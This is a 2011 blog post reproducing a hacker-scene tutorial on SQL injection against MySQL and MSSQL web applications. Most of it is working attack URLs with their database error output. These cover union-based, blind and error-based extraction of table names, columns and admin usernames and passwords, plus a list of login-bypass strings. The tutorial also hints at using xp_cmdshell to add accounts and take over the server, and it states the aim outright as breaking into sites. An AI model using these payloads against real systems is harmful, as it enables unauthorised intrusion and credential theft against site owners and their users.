Thursday, January 27, 2011

Advanced MYSQL & MSSQL INJECTION

You all will be glad to know that a 14 year old friend of mine submitted awesome whitepaper on mysql&mssql injections


#####################################################################
# Title: Advanced Sql Injection including Mysql,Mssql & a guide to oracle
# Date : 22 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t@yahoo.in
# Facebook: fb.me/yoShubH
# My Teams : Indishell,IW,AoH,SWATS,Team StuXnet etc.
# Contents-
 

=> Mysql- Blind + union
=> Mssql- Blind + Union + error based
// => For oracle plz refer tohttp://
dl.packetstormsecurity.net/papers/database/Hacking_Oracle_From_Web_2.pdf :)
# Suggested Automated tools-
=> Havij: itsecteamc.com
# Vulnerability scanners
=> Acunetix wvs
=> Jsky
==========================================================================================
Hmmm... So Let's Start, I think it's my first paper being written for you all ;) I don't
remember the exact definition of sql Injection so
I'll get that for you from google ;)
Q. What is Sql Injection ?
A. SQL injection is a code injection technique that exploits a security vulnerability
occurring in the database layer of an application.
I don't want to boar you ;) so a simple short definiton is above..
Types of Sql Injection-
# Blind
# Union
# Error //not availble in mysql
Google them to get the definitions :)..!
Injection types-
# String- http://test.com/index.php?id=1 having 1=1
# Integer- http://test.com/index.php?id='1 having 1=1
hope you can see the difference.
Server types I know & I'll teach you-
# Mysql
# Mssql
===========================================================================================
###########################################################################################
Let's start with Mysql:
-1-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
Mysql has 2 types only as mentioned above.you need to know the following things about the DB
you are attacking-
# Number of columns
# Table names
# column names
# Let's start with union Attack, the most common, every n00b should no it :p-
=> http://test.com/index.php?id=1 order by 10--
^ This gives me an error
Let's again try
=> http://test.com/index.php?id=1 order by 7--
^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5--
Whoa !! the page is Loading normally
It means, Number of columns => 5
you can do it with mssql as well.
# Now the next part-
I'm using union select statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't gives you anything, change the first part of the query to a negative value.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on you screen. In my case it is 2. Now we know that column 2 will
echo data back to us. :D
# getting Mysql version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get with this try this-
=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5--
Now you will get get the version name
it can be-
# 5+
# 5>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Table extraction for version 5+ :
-2-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from
information_schema.tables--
It'll show a lot of tables, if you want to get into the site, usually you need to get the
admin's login info :D
So, In my case I need to exploit into a table named => admin
which contains information, I need :D
Now I got the Tables names & I need to extract the column names from them so the query will
be-
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from
information_schema.columns where table_name=admin--
This will show you the column names inside the table Admin. if it gives you an error you
need to change the text value of admin to mysql char.
I use hackbar, a Firefox addon to do so.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be-
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from
information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
It show the columns names to me. In my case they are-
# user_name
# user_password
# sex
# uid
We only need to know username & pass so we reject the rest two. Okay ? :D
The next query will be for extracting the final data I need- :D
=> http://test.com/index.php?id=-1 union all select
1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
where 0x3a is the hex value of => :
VOILA !
I got the username & pass, it is => shubham:password
password can also be encrypted. So you can use few online decrypters or a software I know =>
Password Pro
This was all for Mysql 5+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Let's Start with mysql 5>
Version 4 or below 5 does not contain any => Information_schema
-3-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
so you have to guess them, Like people guess while playing KBC (who want to be a millionaire)
hahaha :D
we know the number of columns that is 5.
=> Let's Start guessing the table:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ This one gives me error
=> => http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Voila I guessed the right, you must be thinking ShubhaM is a Genious xD :p
=> Next part is Guessing the columns:
as we had done earlier & had found the vulnerable column is 2...so lets process further.
guess something similar to a username.
=> http://test.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got error. Retrying...
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
Hurray ! It gotta work baby & I got the username :D...!
=> let's guess the password column now
=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error
one more try-
=> http://test.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--
hahaha...got the pass !!!
This is the end of Mysql 5> union.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
# Mysql Blind-
Most fu*king part. I really hate this. :X :P :X
Q. what is Blind Sql Injection ?
A. Blind SQL Injection is used when a web application is vulnerable to an SQL injection but
the results of the injection are not visible to the attacker. The page with the
vulnerability may not be one that displays data but will display differently depending on
the results of a logical statement injected into the legitimate SQL statement called for
that page. This type of attack can become time-intensive because a new statement must be
crafted for each bit recovered. There are several tools that can automate these attacks once
the location of the vulnerability and the target information has been established.
-4-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
^ copied it from wikipedia ;)
hope you understood. huh !! its 1:11am here in India...I'm very tired :'( :P :P but no
school tommorow coz it is sunday :D
Let's come to the point, enough of fun now !!
# when we want to test for mysql blind-
=> http://test.com/news.php?id=5 and 1=1
^ this is always trues :D & page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is Fake :X
so if some text, picture or some content is missing on returned page then that site is
vulrnable to blind sql injection.
# Getting Mysql version in blind sqlito
get the version in blind attack we use substring
i.e
=> http://test.com/news.php?id=5 and substring(@@version,1,1)=4
# this should return TRUE if the version of MySQL is 4.
# replace 4 with 5, and if query return TRUE then the version is 5.
# Test if subselect works
when select don't work then we use subselect
i.e
=> http://test.com/news.php?id=5 and (select 1)=1
# if page loads normally then subselects work.
Now, :D Let's see if we have access to => Mysql.user
=> http://test.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password
usign load_file() function and OUTFILE.
# Check table and column names
# This is part when guessing of the game KBC works :D :))
that is,
=> http://test.com/news.php?id=5 and (select 1 from users limit 0,1)=1
-5-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row,
this is very important.)
# then if the page loads normally without content missing, the table users exits.
# if you get FALSE (some article missing), just change table name until you guess the right
one :)
# let's say that I have found that table name is users, now what we need is column name !! :D
# The same as table name, we start guessing.
=> http://test.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users
limit 0,1)=1
#if the page loads normally we know that column name is password (if we get false then try
common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
# Pull data from database
I found table users i columns username password so I'm gonna pull characters from that.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1
character into ascii value
# and then compare it with simbol greater then > .
# so if the ascii char greater then 80, the page loads normally. (TRUE)
# keep trying until get false.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing :D
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>98
TRUE again, higher :D
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>99
FALSE!!!
:D :D
# so the first character in username is char(99). Using the ascii converter we know that
-6-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
char(99) is letter 'c'.
=>> then let's check the second character.
# http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),2,1))>99
# Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the
second character, 1 character in lenght)
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>107
# FALSE, lower number.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>104
# TRUE, higher.
http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>105
# FALSE!!!
# we know that the second character is char(105) and that is 'i'. We have 'ci' so far
# so keep incrementing until you get the end. (when >0 returns false we know that we have
reach the end).
It is very very fucking boaring :P :'( :X
There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing
everything manually,
cause that makes you better INJ3CT0R :D
Finishing this Mysql part here. :P :P
next is mssql :P
==============================================================================================
========
##############################################################################################
##########
My head is paining like hell...I'll continue after few hours ;)
Lolz...I'm back after 24 hours :D
Mssql is the best part, I like it !! due to many reasons...everyn00b can't do it :P
I had learnt mssql injection from very good people like- Stranger(ICA),CWH Underground
-7-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
[www.milw0rm.com/author/1456] & a book given to be my friend d3c0mil3r etc.
# MSsql Injection-
Hope you know how to test sqli vulnerablity, So I'm leaving that part.
# Bypassing Authenctication- common for n00bs:
+-----------------------------+
| ' or 1=1 -- |
| a' or 1=1 -- |
| " or 1=1 -- |
| a" or 1=1 -- |
| ' or 1=1 # |
| " or 1=1 # |
| or 1=1 -- |
| ' or 'x'='x |
| " or "x"="x |
| ') or ('x'='x |
| ") or ("x"="x |
| ' or username LIKE '%admin% |
+-----------------------------+
| USERNAME: ' or 1/* |
| PASSWORD: */ =1 -- |
+-----------------------------+
| USERNAME: admin' or 'a'='a |
| PASSWORD: '# |
+-----------------------------+
=> Mssql Injection with Union Attacl:
I love Union <3
I've this site to test upon my power => http://test.com/news.asp?id=1
Ok, Let's Start-
# First find out the number of columns, counting one by one is boaring :P so I'll use "Hit &
Trial Method", that I had learnt somewhere in Maths :D
ok. => http://test.com/news.asp?id=1 order by 6--
We'll hit, until we get a error like this one-
[error] Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the select
list.
/showthread.asp, line 9
[/error]
again trying to hit,
=> http://test.com/news.asp?id=1 order by 4--
whoa !! worked :D
# Now I'll use union again-
-8-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,44--
# We will see "11" or "22" or "33" or "44" appeared on some point in returned page.
WOW ! i found 44 on my laptop's screen, so i'll replace 44 with @@version
=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,@@version--
^ So, this gives me the version Information.
Let's continue in grabbing the rest data, I'm using information_schema, as like we did in
Mysql :P
I think concat do not works in mssql, never tried also, if working also, I don't know how to
! :P coz I'm just a 10th std student. No idea abt sql :P
So the next,
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from
information_schema.tables--
^ this gives me the name of first table, i.e => threads
I'll use the first table to get the next one & so on...untill u get what u want
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from
information_schema.tables where table_name not in ('threads')--
^ This gives me the name of the next table, i.e.=> users :D
Users is the required table for me which contains the info I need :D
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users'--
^ this gives me the column name,i.e,uname. as we did to find the tables. same we'll do with
columns. Ok? :)
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users' and
column_name not in ('uname')--
^ this gives me the next column,i.e, upass :D
Lolz, now I need data from these two columns :D
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--
^ same with upass
this time my uname is admin. so to find next row, we do
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname
not in ('admin')--
further as well, we can extract the rest of the data. hope you understood this much !!
-9-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
Now next part is mssql blind :D
==============================================================================================
====
# Mssql blind :
# testing-
=> http://test.com/news.asp?id=1 and 1=1
another one => http://test.com/news.asp?id=1 and 1=2
If these two give different results that simply means that the fucking site is vulnerable to
Mssql blind :D :P :x
# I'm copy pasting some queries from my notes :P :D
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT
LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
^ your idea of picking the ascii code can be Different. :D :P
^ valid :(
hit it againhttp://
test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>120
^
in this case result will be like 1=2
next we try,
http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>105
I tried with these-
# >112-Invalid
# >108-Valid
# >110-Invalid
# >109-Invalid
So therefore, ascii value is equal to => 109 :)
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT
LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109
Rest on your own...keep manipulating to get info :P
# Getting Table name- one of the hardest part, finding each character of table is really
boaring :P
use automated tools for this :P the queries are very complicated here :x
Let's start-
-10-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM
sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)>97
^ this one is used to get first character of first table.
second character:
=> http://test.com/news.asp?id-1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM
sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97
and so on....I'm not gonna dwell on it :P
# Getting column name-
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM
sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97
Change the table name to mssql char, example if it is users change it tochar(
117)+char(115)+char(101)+char(114)
# 2nd character-
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT
(SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE
name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS
varchar(8000)),2,1)),0)>97
& so on....Now finishing this mssql blind.
==============================================================================================
=========================
### Mssql Error based-
Types-
# ODBC Error Message Attack with "HAVING" and "GROUP BY"
# ODBC Error Message Attack with "CONVERT"
# Soap (not including soap in this paper)
Let's start with
# ODBC Error Message Attack with "HAVING" and "GROUP BY"--->
I'll inject having command now,
=> http://test.com/news.asp?id=1 having 1=1--
getting some error...err
-11-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in
the select list because it is not contained in an aggreate function and there is no
GROUP BY clause.
[/error]
it shows table name is news & one column => news_id is contained in it :P
# combining having & group by
=> http://test.com/news.asp?id=1 GROUP BY news.news_id HAVING 1=1--
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid
in
the select list because it is not contained in an aggreate function and there is no
GROUP BY clause.
[/error]
it shows second column of first table is news_author :D
third column can be obtained using the 2nd one
=> http://test.com/news.asp?id=1 GROUP BY news.news_id,news.news_author HAVING 1=1--
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid
in
the select list because it is not contained in an aggreate function and there is no
GROUP BY clause.
[/error]
third column is => news_detail
and so on...
Now,
## ODBC Error Message Attack with "CONVERT"-
here I'll show you how to grab, MSSQL_Version, DB_name, User_name.
=> http://test.com/news.asp?id=1+and+1=convert(int,@@version)--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 -
9.00.3042.00 (Intel X86) Feb 9 2007
22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT
5.2 (Build 3790: Service Pack 1)
-12-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
' to data type int.
/page.asp, line 9
[/error]
therefore I know => the version of MSSQL and OS (Windows 2003 Server)
other things u can grab by replacing @@version with-
# db_name()
# user_name()
if in the user name it gives => Sa
it means you can use Xp_cmdshell, that will I'll tell u later, to enable rdp i.e. remote
desktop & hack the whole box :P :D
# Obtaining tables-
=>
http://site.com/news.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_sche
ma.tables))--
Result is threads, so
Next one,
=>
http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_sche
ma.tables+where+table_name+
not+in+('threads')))--
& so now...you can continue further now.
Next table for me is users that i founded using the threads one..! So now i need columns
from the table threads, Okay ? :)
# Finding columns
=>
http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_sch
ema.columns+where+table_name='users'))--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
[/error]
First column is Uname ;)
So I continue
=>
http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_sch
ema.columns+where+table_name='users'+
and+column_name+not+in+('uname')))--
-13-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
^ as we had done earlier :D
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
[/error]
For getting more column names,
we only append a known table list like that in getting table names.
# extracting data
=> http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users))--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
[/error]
same with upass ;)
Rest you are now on your own In mssql ;)
I'm leaving it here....it is much of done !!! now the thing left is that to use your brain. ;)
# Soap Injection-
Leaving this part :P I'll later make a paper on it ;)
end of MSsql ... :P
# Xp_cmdshell
I'd recommend to use some automated tools, I'm not in mood of writing on xp_cmdshell, though
it consists of simple cmd commands to activate rdp & using net user u can add an account.
but complicated queries.
========================================================================
############################################################################################
# References-
# Hackforums.net
# www.hackersbay.in
# Academyofhacking.com
# Indishell.in
# packetstormsecurity.org
############################
Greetz To-
###
greetz- C00lt04d,Cyb3rgr00f,Reb0rn,c0d3br34k3r,3thicaln00b,Cyb3rS4m,g00gl3 w4rri0r & All my
friends at AOH & Indishell.
special thanks- H4ck0lic, Bad Man :)
##########################################################################################



download link for pdf

No comments:

Post a Comment